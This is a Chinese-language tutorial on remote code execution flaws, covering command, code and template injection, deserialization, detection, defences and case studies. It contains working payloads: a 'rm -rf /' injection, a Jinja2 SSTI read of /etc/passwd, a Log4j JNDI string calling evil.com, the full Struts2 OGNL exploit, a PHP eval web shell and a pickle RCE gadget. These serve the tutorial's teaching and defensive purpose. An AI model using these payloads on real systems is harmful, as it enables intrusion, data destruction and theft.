引言

远程代码执行（Remote Code Execution，简称RCE）是Web安全中最危险的漏洞类型之一，允许攻击者在目标服务器上执行任意代码，从而完全控制服务器、窃取数据、横向移动或进一步攻破网络。RCE通常源于应用对用户输入的处理不当，如命令注入、反序列化、模板注入等。

RCE漏洞定义与分类

定义

RCE是指攻击者通过网络请求触发服务器执行恶意代码的能力。与本地代码执行不同，RCE允许远程控制，无需物理访问或本地权限。

主要分类

命令注入（Command Injection）
- 通过shell命令拼接执行系统命令
- 常见于system(), exec(), popen()等函数
代码注入（Code Injection）
- 直接注入可执行代码，如eval(), exec(), Function()等
- 包括模板注入、表达式注入
反序列化漏洞（Deserialization）
- 通过恶意序列化对象触发代码执行
- 常见于Java、Python、PHP的反序列化过程
模板注入（Template Injection）
- 在模板引擎中注入恶意表达式
- 如Jinja2、Twig、Freemarker等
其他类型
- 格式化字符串漏洞
- 缓冲区溢出（更偏向于二进制漏洞）
- 依赖库漏洞（如Log4j）

RCE利用原理

命令注入原理

当应用将用户输入直接拼接到系统命令时，攻击者可注入额外命令：

1
2
3

// 脆弱代码
$ip = $_GET['ip'];
system("ping -c 4 $ip");

攻击payload：127.0.0.1; rm -rf /

代码注入原理

应用直接执行用户提供的代码字符串：

1
2
3

# 脆弱代码
code = request.args.get('code')
exec(code)

攻击payload：__import__('os').system('id')

反序列化原理

攻击者构造恶意对象，在反序列化时触发__destruct()、__wakeup()等魔术方法：

1 2	// 脆弱代码 $data = unserialize($_POST['data']);

攻击payload：构造包含system('id')的序列化对象。

模板注入原理

模板引擎将用户输入当作模板表达式解析：

# Jinja2脆弱代码
from jinja2 import Template
template = Template(request.args.get('template'))
template.render()

攻击payload：{{config.__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()}}

RCE常见触发场景

系统命令执行接口

ping、traceroute、nslookup等网络工具
文件处理：convert、ffmpeg、ImageMagick
备份/压缩：tar、zip、gzip

动态代码执行

PHP：eval(), assert(), preg_replace('/.*/e', ...)
Python：eval(), exec(), compile()
JavaScript：eval(), Function(), setTimeout(string)
Ruby：eval(), instance_eval()

序列化/反序列化

Java：ObjectInputStream.readObject()
PHP：unserialize()
Python：pickle.loads(), yaml.load()
.NET：BinaryFormatter.Deserialize()

模板引擎

SSTI（Server-Side Template Injection）
Jinja2、Twig、Velocity、Freemarker
Handlebars、Mustache（客户端但可服务端渲染）

第三方库与框架

Struts2 OGNL表达式
Spring Data SpEL
Log4j JNDI注入
Jackson JSON处理

RCE危害与影响

直接危害

完全服务器控制：执行任意命令，安装后门
数据窃取：读取数据库、配置文件、用户数据
权限提升：从Web用户提升到root/system权限
网络渗透：作为跳板攻破内网其他系统

间接危害

持久化访问：写入Web Shell或定时任务
拒绝服务：执行资源消耗命令
供应链攻击：影响下游用户或服务
数据篡改：修改文件、数据库记录

风险评估

CVSS评分：通常9.0-10.0（Critical）
业务影响：可能导致数据泄露、系统瘫痪、法律责任
修复优先级：最高，应立即处理

RCE检测方法

手工测试

命令注入测试
- 输入：; id 或 | id 或 && id
- 观察响应是否包含命令执行结果
代码注入测试
- 输入：print(1+1) 或 system('id')
- 检查是否执行或返回结果
反序列化测试
- 构造简单序列化对象
- 观察异常或意外行为
模板注入测试
- 输入：${7*7} 或 {{7*7}}
- 检查是否计算并返回49

自动化工具

Burp Suite：Intruder、Scanner模块
sqlmap：支持命令注入检测
Commix：专门的命令注入工具
ysoserial：Java反序列化payload生成
Tplmap：模板注入检测
Nuclei：模板化RCE扫描

代码审计要点

搜索危险函数：eval, exec, system, popen, unserialize, pickle, yaml.load
检查输入拼接：字符串连接到命令或代码
验证序列化来源：确保只反序列化可信数据
审计模板渲染：检查用户输入是否影响模板

运行时检测

监控异常进程：ps aux检查可疑命令
日志分析：查找命令执行痕迹
网络流量：检测异常出站连接
文件监控：检查新增/修改的可疑文件

RCE防御策略

核心原则：最小权限 + 输入验证

避免危险函数

禁止使用eval(), exec(), system()等
使用安全替代：subprocess.run() with shell=False
白名单命令执行

输入验证与转义

# 安全命令执行
import subprocess
import shlex

def safe_execute(cmd_input):
    allowed_cmds = ['ping', 'traceroute', 'nslookup']
    parts = shlex.split(cmd_input)
    if parts[0] not in allowed_cmds:
        raise ValueError("Command not allowed")
    # 限制参数
    if len(parts) > 3:
        raise ValueError("Too many arguments")
    result = subprocess.run(parts, capture_output=True, text=True, timeout=10)
    return result.stdout

序列化安全

使用安全序列化格式：JSON、MessagePack
避免通用反序列化：pickle, yaml.load(unsafe_load)
实施对象白名单或签名验证

# Python安全反序列化
import json
import hmac
import hashlib

def safe_deserialize(data, secret_key):
    try:
        payload = json.loads(data)
        signature = payload.pop('signature', '')
        expected = hmac.new(secret_key.encode(), json.dumps(payload, sort_keys=True).encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(signature, expected):
            raise ValueError("Invalid signature")
        return payload
    except:
        raise ValueError("Invalid data")

模板引擎安全配置

# Jinja2安全配置
from jinja2 import Environment, select_autoescape

env = Environment(
    autoescape=select_autoescape(['html', 'xml']),
    loader=FileSystemLoader('templates'),
    # 禁用危险功能
    enable_async=False
)
# 只允许安全函数
env.globals.update(zip=zip, len=len)  # 不允许eval等

沙箱与隔离

使用沙箱执行用户代码：exec() with restricted globals
容器化部署：限制文件系统、网络访问
SELinux/AppArmor：强制访问控制

WAF与监控

检测命令注入模式：;, |, &&, ||
监控异常命令执行
实施速率限制和异常检测

框架级防护

Spring Security：防止SpEL注入
Django：自动转义模板
Express.js：使用helmet中间件
Laravel：避免eval()输入

RCE深度扩展

命令注入高级绕过

编码绕过：$(echo 'id' | base64 -d | bash)
变量扩展：${PATH##*/} 或 ${!HOME}
命令替换：`id` 或 $()
无字母shell：使用数字、符号构造命令

反序列化利用链

Java Gadget Chain：CommonsCollections、Jackson等
PHP POP Chain：利用魔术方法构造调用链
Python Pickle RCE：通过__reduce__执行任意代码

模板注入利用

SSTI to RCE：从数学运算到代码执行
AngularJS客户端注入：虽然客户端，但可影响服务端
Jinja2沙箱逃逸：绕过SandboxedEnvironment

依赖库漏洞

Log4j JNDI：${jndi:ldap://evil.com/a}
Jackson Polymorphic：JSON类型混淆
Fastjson：autoType开启时的反序列化

现代RCE变体

GraphQL注入：查询中的命令执行
Serverless函数RCE：Lambda/SAM中的代码注入
容器逃逸：Docker/K8s中的命令执行

典型案例分析

案例1：Struts2 OGNL注入

背景：Struts2框架处理用户输入时未正确验证OGNL表达式。

利用：

`%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}`

影响：远程代码执行，控制服务器。

修复：升级Struts2，禁用动态方法调用。

案例2：PHP eval()代码注入

背景：某CMS允许用户自定义模板代码。

利用：

1	在模板中注入`<?php eval($_POST['cmd']); ?>`

影响：持久化Web Shell。

修复：移除eval()，使用沙箱模板引擎。

案例3：Python pickle反序列化

背景：应用使用pickle存储用户会话。

利用：

import pickle
import os

class EvilPickle:
    def __reduce__(self):
        return (os.system, ('id',))

evil = EvilPickle()
data = pickle.dumps(evil)
# 发送data到服务器